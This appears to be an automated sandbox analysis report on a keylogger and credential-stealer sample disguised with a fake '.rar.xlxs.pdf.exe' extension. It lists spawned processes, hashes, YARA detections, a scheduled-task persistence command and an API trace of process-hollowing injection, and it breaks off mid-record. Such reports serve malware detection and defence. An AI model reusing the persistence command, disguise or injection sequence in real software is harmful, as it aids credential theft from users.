                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:03:16:25
                                                            Start date:03/10/2024
                                                            Path:C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
                                                            Imagebase:0x9a0000
                                                            File size:884'224 bytes
                                                            MD5 hash:BE92B638000820878C7BE0E70E257C95
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:15
                                                            Start time:03:16:27
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff7fb730000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:03:16:27
                                                            Start date:03/10/2024
                                                            Path:C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            Imagebase:0x420000
                                                            File size:884'224 bytes
                                                            MD5 hash:BE92B638000820878C7BE0E70E257C95
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 50%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:03:16:34
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp"
                                                            Imagebase:0x550000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:03:16:34
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:03:16:34
                                                            Start date:03/10/2024
                                                            Path:C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\SOFcFE.exe"
                                                            Imagebase:0x9e0000
                                                            File size:884'224 bytes
                                                            MD5 hash:BE92B638000820878C7BE0E70E257C95
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000014.00000002.3760059045.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:10.5%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:191
                                                              Total number of Limit Nodes:9
                                                              execution_graph 26037 10a4668 26038 10a467a 26037->26038 26039 10a4686 26038->26039 26041 10a4783 26038->26041 26042 10a479d 26041->26042 26046 10a4888 26042->26046 26050 10a487f 26042->26050 26047 10a48af 26046->26047 26049 10a498c 26047->26049 26054 10a44b0 26047->26054 26052 10a4888 26050->26052 26051 10a498c 26051->26051 26052->26051 26053 10a44b0 CreateActCtxA 26052->26053 26053->26051 26055 10a5918 CreateActCtxA 26054->26055 26057 10a59db 26055->26057 26075 10aafb8 26076 10aaffa 26075->26076 26077 10ab000 GetModuleHandleW 26075->26077 26076->26077 26078 10ab02d 26077->26078 26058 10ad060 26059 10ad062 GetCurrentProcess 26058->26059 26061 10ad0f8 GetCurrentThread 26059->26061 26062 10ad0f1 26059->26062 26063 10ad12e 26061->26063 26064 10ad135 GetCurrentProcess 26061->26064 26062->26061 26063->26064 26067 10ad16b 26064->26067 26065 10ad193 GetCurrentThreadId 26066 10ad1c4 26065->26066 26067->26065 26079 10ad6b0 26080 10ad6b2 DuplicateHandle 26079->26080 26081 10ad746 26080->26081 25840 9cca687 25841 9cca60b 25840->25841 25842 9cca7f8 25841->25842 25845 9cccfc8 25841->25845 25862 9cccfb8 25841->25862 25846 9cccfe2 25845->25846 25854 9ccd006 25846->25854 25879 9ccd6f6 25846->25879 25890 9ccd654 25846->25890 25895 9ccd55e 25846->25895 25908 9ccdac3 25846->25908 25913 9ccd483 25846->25913 25917 9ccd803 25846->25917 25926 9ccda87 25846->25926 25931 9ccd5a8 25846->25931 25936 9ccd94d 25846->25936 25941 9ccd6b3 25846->25941 25947 9ccda53 25846->25947 25952 9ccd4d2 25846->25952 25961 9ccd4f7 25846->25961 25974 9ccde16 25846->25974 25854->25842 25863 9cccfe2 25862->25863 25864 9ccd94d 2 API calls 25863->25864 25865 9ccd5a8 2 API calls 25863->25865 25866 9ccda87 2 API calls 25863->25866 25867 9ccd803 4 API calls 25863->25867 25868 9ccd483 2 API calls 25863->25868 25869 9ccdac3 2 API calls 25863->25869 25870 9ccd55e 6 API calls 25863->25870 25871 9ccd654 2 API calls 25863->25871 25872 9ccd6f6 4 API calls 25863->25872 25873 9ccde16 2 API calls 25863->25873 25874 9ccd4f7 6 API calls 25863->25874 25875 9ccd006 25863->25875 25876 9ccd4d2 4 API calls 25863->25876 25877 9ccda53 2 API calls 25863->25877 25878 9ccd6b3 2 API calls 25863->25878 25864->25875 25865->25875 25866->25875 25867->25875 25868->25875 25869->25875 25870->25875 25871->25875 25872->25875 25873->25875 25874->25875 25875->25842 25876->25875 25877->25875 25878->25875 25979 9cc9f49 25879->25979 25983 9cc9f50 25879->25983 25880 9ccd3d1 25880->25854 25881 9ccd4de 25881->25880 25883 9ccd4f0 25881->25883 25987 9cc9e90 25881->25987 25991 9cc9e8b 25881->25991 25882 9ccdd23 25888 9cc9f49 WriteProcessMemory 25883->25888 25889 9cc9f50 WriteProcessMemory 25883->25889 25888->25882 25889->25882 25891 9ccdc70 25890->25891 25995 9cc997b 25891->25995 25999 9cc9980 25891->25999 25892 9ccdc8b 25896 9ccd500 25895->25896 25896->25895 25897 9ccd568 25896->25897 25898 9ccd4de 25896->25898 26003 9cce158 25896->26003 26008 9cce153 25896->26008 25897->25854 25900 9ccd4f0 25898->25900 25901 9ccd3d1 25898->25901 25902 9cc9e8b VirtualAllocEx 25898->25902 25903 9cc9e90 VirtualAllocEx 25898->25903 25899 9ccdd23 25904 9cc9f49 WriteProcessMemory 25900->25904 25905 9cc9f50 WriteProcessMemory 25900->25905 25901->25854 25902->25898 25903->25898 25904->25899 25905->25899 25909 9ccdac7 25908->25909 26013 9cc98cb 25909->26013 26017 9cc98d0 25909->26017 25910 9ccdaf3 26021 9cca1cc 25913->26021 26025 9cca1d8 25913->26025 25922 9cc9e8b VirtualAllocEx 25917->25922 25923 9cc9e90 VirtualAllocEx 25917->25923 25918 9ccd4de 25918->25917 25919 9ccd4f0 25918->25919 25921 9ccd3d1 25918->25921 25924 9cc9f49 WriteProcessMemory 25919->25924 25925 9cc9f50 WriteProcessMemory 25919->25925 25920 9ccdd23 25921->25854 25922->25918 25923->25918 25924->25920 25925->25920 25927 9ccda54 25926->25927 25929 9cc98cb ResumeThread 25927->25929 25930 9cc98d0 ResumeThread 25927->25930 25928 9ccdaf3 25929->25928 25930->25928 25932 9ccd5b4 25931->25932 25934 9cc9f49 WriteProcessMemory 25932->25934 25935 9cc9f50 WriteProcessMemory 25932->25935 25933 9ccddb6 25934->25933 25935->25933 25937 9ccd951 25936->25937 25939 9cc98cb ResumeThread 25937->25939 25940 9cc98d0 ResumeThread 25937->25940 25938 9ccdaf3 25939->25938 25940->25938 25942 9ccd951 25941->25942 25943 9ccdd52 25942->25943 25945 9cc98cb ResumeThread 25942->25945 25946 9cc98d0 ResumeThread 25942->25946 25943->25854 25944 9ccdaf3 25945->25944 25946->25944 25948 9ccda54 25947->25948 25950 9cc98cb ResumeThread 25948->25950 25951 9cc98d0 ResumeThread 25948->25951 25949 9ccdaf3 25949->25949 25950->25949 25951->25949 25955 9ccd4de 25952->25955 25953 9ccd4f0 25959 9cc9f49 WriteProcessMemory 25953->25959 25960 9cc9f50 WriteProcessMemory 25953->25960 25954 9ccdd23 25955->25953 25956 9ccd3d1 25955->25956 25957 9cc9e8b VirtualAllocEx 25955->25957 25958 9cc9e90 VirtualAllocEx 25955->25958 25956->25854 25957->25955 25958->25955 25959->25954 25960->25954 25962 9ccd500 25961->25962 25963 9ccd4de 25962->25963 25966 9ccd568 25962->25966 25970 9cce158 2 API calls 25962->25970 25971 9cce153 2 API calls 25962->25971 25965 9ccd4f0 25963->25965 25967 9ccd3d1 25963->25967 25968 9cc9e8b VirtualAllocEx 25963->25968 25969 9cc9e90 VirtualAllocEx 25963->25969 25964 9ccdd23 25972 9cc9f49 WriteProcessMemory 25965->25972 25973 9cc9f50 WriteProcessMemory 25965->25973 25966->25854 25967->25854 25968->25963 25969->25963 25970->25962 25971->25962 25972->25964 25973->25964 25975 9ccde30 25974->25975 26029 9cca03b 25975->26029 26033 9cca040 25975->26033 25976 9ccde53 25980 9cc9f50 WriteProcessMemory 25979->25980 25982 9cc9fef 25980->25982 25982->25881 25984 9cc9f98 WriteProcessMemory 25983->25984 25986 9cc9fef 25984->25986 25986->25881 25988 9cc9ed0 VirtualAllocEx 25987->25988 25990 9cc9f0d 25988->25990 25990->25881 25992 9cc9ed0 VirtualAllocEx 25991->25992 25994 9cc9f0d 25992->25994 25994->25881 25996 9cc9980 Wow64SetThreadContext 25995->25996 25998 9cc9a0d 25996->25998 25998->25892 26000 9cc99c5 Wow64SetThreadContext 25999->26000 26002 9cc9a0d 26000->26002 26002->25892 26004 9cce16d 26003->26004 26006 9cc997b Wow64SetThreadContext 26004->26006 26007 9cc9980 Wow64SetThreadContext 26004->26007 26005 9cce183 26005->25896 26006->26005 26007->26005 26009 9cce16d 26008->26009 26011 9cc997b Wow64SetThreadContext 26009->26011 26012 9cc9980 Wow64SetThreadContext 26009->26012 26010 9cce183 26010->25896 26011->26010 26012->26010 26014 9cc9910 ResumeThread 26013->26014 26016 9cc9941 26014->26016 26016->25910 26018 9cc9910 ResumeThread 26017->26018 26020 9cc9941 26018->26020 26020->25910 26022 9cca261 CreateProcessA 26021->26022 26024 9cca423 26022->26024 26026 9cca261 CreateProcessA 26025->26026 26028 9cca423 26026->26028 26030 9cca08b ReadProcessMemory 26029->26030 26032 9cca0cf 26030->26032 26032->25976 26034 9cca08b ReadProcessMemory 26033->26034 26036 9cca0cf 26034->26036 26036->25976 26068 9cce1e0 26069 9cce36b 26068->26069 26071 9cce206 26068->26071 26071->26069 26072 9ccaf2c 26071->26072 26073 9cce460 PostMessageW 26072->26073 26074 9cce4cc 26073->26074 26074->26071
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05ab0372b2da075beb99036e7dc50e04a98ca3e29bc14616cb6ae4fdf6733a31
                                                              • Instruction ID: 46a01f925f762d8dd4c97bcb946f8e402fb3559c4dc2afecad335f8802e5eb46
                                                              • Opcode Fuzzy Hash: 05ab0372b2da075beb99036e7dc50e04a98ca3e29bc14616cb6ae4fdf6733a31
                                                              • Instruction Fuzzy Hash: C051E3B1D45629CBEB28CF66D8407E9FAB6BF89300F04D1FAD50DA6250EB705A85CF50
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 83c1dfd385719dc7ba3092cd2265ff7320992302692425578ee7171fe3456ff4
                                                              • Instruction ID: 5e14448f195ff5b03d72b80d9fd1882fb0e1df854e578ba789667c773ea46ea4
                                                              • Opcode Fuzzy Hash: 83c1dfd385719dc7ba3092cd2265ff7320992302692425578ee7171fe3456ff4
                                                              • Instruction Fuzzy Hash: 3D2109B1D056588BEB18CFA6D8553EEBFF6AF89300F04C06AD4096A2A5DB740949CF90

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 010AD0DE
                                                              • GetCurrentThread.KERNEL32 ref: 010AD11B
                                                              • GetCurrentProcess.KERNEL32 ref: 010AD158
                                                              • GetCurrentThreadId.KERNEL32 ref: 010AD1B1
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1358269074.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: b04a5446737a79d865a050fae9e45a7bdee1daa83680339bb4595a2ed279599c
                                                              • Instruction ID: fd3134a4a6112af26f1834d1263c5212c24fa875121e29dc4e98bebb4af03ddf
                                                              • Opcode Fuzzy Hash: b04a5446737a79d865a050fae9e45a7bdee1daa83680339bb4595a2ed279599c
                                                              • Instruction Fuzzy Hash: A65156B0D003499FEB54DFAAD588BDEBBF1AB88310F208459E059A73A0DB346845CB65

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 010AD0DE
                                                              • GetCurrentThread.KERNEL32 ref: 010AD11B
                                                              • GetCurrentProcess.KERNEL32 ref: 010AD158
                                                              • GetCurrentThreadId.KERNEL32 ref: 010AD1B1
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1358269074.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 3aed19cdb3fdf6b73e8186275036c427aa682bd1fc8fe183bed5f11be6ac5a10
                                                              • Instruction ID: 2000b944d8bbe60da7ded62cf5129d2d5fa253ea7dc6f957cdf3b4ff4798f10c
                                                              • Opcode Fuzzy Hash: 3aed19cdb3fdf6b73e8186275036c427aa682bd1fc8fe183bed5f11be6ac5a10
                                                              • Instruction Fuzzy Hash: C45145B0D007499FEB14DFAAD588BDEBBF1AF88314F208459E018A73A0DB346845CF65

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 47 9cca1cc-9cca26d 49 9cca26f-9cca279 47->49 50 9cca2a6-9cca2c6 47->50 49->50 51 9cca27b-9cca27d 49->51 57 9cca2ff-9cca32e 50->57 58 9cca2c8-9cca2d2 50->58 52 9cca27f-9cca289 51->52 53 9cca2a0-9cca2a3 51->53 55 9cca28d-9cca29c 52->55 56 9cca28b 52->56 53->50 55->55 59 9cca29e 55->59 56->55 64 9cca367-9cca421 CreateProcessA 57->64 65 9cca330-9cca33a 57->65 58->57 60 9cca2d4-9cca2d6 58->60 59->53 62 9cca2d8-9cca2e2 60->62 63 9cca2f9-9cca2fc 60->63 66 9cca2e4 62->66 67 9cca2e6-9cca2f5 62->67 63->57 78 9cca42a-9cca4b0 64->78 79 9cca423-9cca429 64->79 65->64 68 9cca33c-9cca33e 65->68 66->67 67->67 69 9cca2f7 67->69 70 9cca340-9cca34a 68->70 71 9cca361-9cca364 68->71 69->63 73 9cca34c 70->73 74 9cca34e-9cca35d 70->74 71->64 73->74 74->74 75 9cca35f 74->75 75->71 89 9cca4c0-9cca4c4 78->89 90 9cca4b2-9cca4b6 78->90 79->78 92 9cca4d4-9cca4d8 89->92 93 9cca4c6-9cca4ca 89->93 90->89 91 9cca4b8 90->91 91->89 95 9cca4e8-9cca4ec 92->95 96 9cca4da-9cca4de 92->96 93->92 94 9cca4cc 93->94 94->92 97 9cca4fe-9cca505 95->97 98 9cca4ee-9cca4f4 95->98 96->95 99 9cca4e0 96->99 100 9cca51c 97->100 101 9cca507-9cca516 97->101 98->97 99->95 103 9cca51d 100->103 101->100 103->103
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 09CCA40E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 62bc854c97fc87159552c1764fd26f2252f26362f098795a84e33255ff5d9e52
                                                              • Instruction ID: f141ccf91de958c138cf6997587c88894e735ab451b97c74e4fd21fb305eb6bd
                                                              • Opcode Fuzzy Hash: 62bc854c97fc87159552c1764fd26f2252f26362f098795a84e33255ff5d9e52
                                                              • Instruction Fuzzy Hash: 14A17EB1D0071D9FEB24CFA8D845BEDBBB2BF48314F148169E808A7240DB759A85CF91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 104 9cca1d8-9cca26d 106 9cca26f-9cca279 104->106 107 9cca2a6-9cca2c6 104->107 106->107 108 9cca27b-9cca27d 106->108 114 9cca2ff-9cca32e 107->114 115 9cca2c8-9cca2d2 107->115 109 9cca27f-9cca289 108->109 110 9cca2a0-9cca2a3 108->110 112 9cca28d-9cca29c 109->112 113 9cca28b 109->113 110->107 112->112 116 9cca29e 112->116 113->112 121 9cca367-9cca421 CreateProcessA 114->121 122 9cca330-9cca33a 114->122 115->114 117 9cca2d4-9cca2d6 115->117 116->110 119 9cca2d8-9cca2e2 117->119 120 9cca2f9-9cca2fc 117->120 123 9cca2e4 119->123 124 9cca2e6-9cca2f5 119->124 120->114 135 9cca42a-9cca4b0 121->135 136 9cca423-9cca429 121->136 122->121 125 9cca33c-9cca33e 122->125 123->124 124->124 126 9cca2f7 124->126 127 9cca340-9cca34a 125->127 128 9cca361-9cca364 125->128 126->120 130 9cca34c 127->130 131 9cca34e-9cca35d 127->131 128->121 130->131 131->131 132 9cca35f 131->132 132->128 146 9cca4c0-9cca4c4 135->146 147 9cca4b2-9cca4b6 135->147 136->135 149 9cca4d4-9cca4d8 146->149 150 9cca4c6-9cca4ca 146->150 147->146 148 9cca4b8 147->148 148->146 152 9cca4e8-9cca4ec 149->152 153 9cca4da-9cca4de 149->153 150->149 151 9cca4cc 150->151 151->149 154 9cca4fe-9cca505 152->154 155 9cca4ee-9cca4f4 152->155 153->152 156 9cca4e0 153->156 157 9cca51c 154->157 158 9cca507-9cca516 154->158 155->154 156->152 160 9cca51d 157->160 158->157 160->160
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 09CCA40E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: ed35045a37926554c036bc3993f7f1d1ce1ba81e9a0a26aff50f3c980dab64c5
                                                              • Instruction ID: 878da2df859338d5c8034c2fd12ada3154a9081344b6301042521b2142e49ad2
                                                              • Opcode Fuzzy Hash: ed35045a37926554c036bc3993f7f1d1ce1ba81e9a0a26aff50f3c980dab64c5
                                                              • Instruction Fuzzy Hash: 8F916EB1D0072D9FEB24DFA8D845BDDBBB2BF48314F148169E808A7240DB759A85CF91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 161 10a44b0-10a59d9 CreateActCtxA 164 10a59db-10a59e1 161->164 165 10a59e2-10a5a3c 161->165 164->165 172 10a5a4b-10a5a4f 165->172 173 10a5a3e-10a5a41 165->173 174 10a5a60 172->174 175 10a5a51-10a5a5d 172->175 173->172 176 10a5a61 174->176 175->174 176->176
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 010A59C9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1358269074.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 20e605ed6b011bdd3ace97710ded59d88370adfdeaf4eb9585c8ad7a1654eea0
                                                              • Instruction ID: 7b56a65578a7f0951cc4aa56d379d9773e50eed61462096da4ea56cb60349cdc
                                                              • Opcode Fuzzy Hash: 20e605ed6b011bdd3ace97710ded59d88370adfdeaf4eb9585c8ad7a1654eea0
                                                              • Instruction Fuzzy Hash: 0B41F271D0071DCBEB24DFAAC884B8DBBF5BF49314F60816AD408AB251DB756946CF90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 178 10a5913 179 10a591c-10a59d9 CreateActCtxA 178->179 181 10a59db-10a59e1 179->181 182 10a59e2-10a5a3c 179->182 181->182 189 10a5a4b-10a5a4f 182->189 190 10a5a3e-10a5a41 182->190 191 10a5a60 189->191 192 10a5a51-10a5a5d 189->192 190->189 193 10a5a61 191->193 192->191 193->193
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 010A59C9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1358269074.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 8087ae6e8cd6670903ac18b7fd86bb0d5a2aec1bda628577e4e0b172c140f4f9
                                                              • Instruction ID: ff86b4f5dfd5a8a74904e5e0dffd7359b7400f5757e169daa6f3d5eaf828483e
                                                              • Opcode Fuzzy Hash: 8087ae6e8cd6670903ac18b7fd86bb0d5a2aec1bda628577e4e0b172c140f4f9
                                                              • Instruction Fuzzy Hash: D641E0B1D00719CBEB24DFAAC8847CDBBF5BF48314F60816AD408AB261DB756946CF90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 195 9cc9f49-9cc9f9e 198 9cc9fae-9cc9fed WriteProcessMemory 195->198 199 9cc9fa0-9cc9fac 195->199 201 9cc9fef-9cc9ff5 198->201 202 9cc9ff6-9cca026 198->202 199->198 201->202
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 09CC9FE0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: c99e3cba0fb2d6b186a11c2d7981d0bd3fbddb50cbc55114d3a188622f4a8830
                                                              • Instruction ID: b0f9428f25976c96b65003b8d11d0b9efc841f6e31211b2e04dc04c191909b9e
                                                              • Opcode Fuzzy Hash: c99e3cba0fb2d6b186a11c2d7981d0bd3fbddb50cbc55114d3a188622f4a8830
                                                              • Instruction Fuzzy Hash: BE2137B5D003499FDB10DFA9C881BDEBBF5FF48310F10842AE959A7241DB799945CBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 206 9cc9f50-9cc9f9e 208 9cc9fae-9cc9fed WriteProcessMemory 206->208 209 9cc9fa0-9cc9fac 206->209 211 9cc9fef-9cc9ff5 208->211 212 9cc9ff6-9cca026 208->212 209->208 211->212
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 09CC9FE0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 21e8ae3d44fcd62c7a10a141161fe8c9a7aa7c36d191888730716db1b5380fd8
                                                              • Instruction ID: c0da38bb5bb0706e648d3ad10ccfdf749b910b0ab961de1985d7d8fedcd86fe1
                                                              • Opcode Fuzzy Hash: 21e8ae3d44fcd62c7a10a141161fe8c9a7aa7c36d191888730716db1b5380fd8
                                                              • Instruction Fuzzy Hash: F22126B1D003499FDB10DFAAC885BDEBBF5FF48310F10842AE959A7240CB799945CBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 216 9cc997b-9cc99cb 219 9cc99cd-9cc99d9 216->219 220 9cc99db-9cc9a0b Wow64SetThreadContext 216->220 219->220 222 9cc9a0d-9cc9a13 220->222 223 9cc9a14-9cc9a44 220->223 222->223
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09CC99FE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 0bb6adce89a22361e2d4ebdfeaf60be21854a46a5e4d23a3cfa7993ac10c7ad1
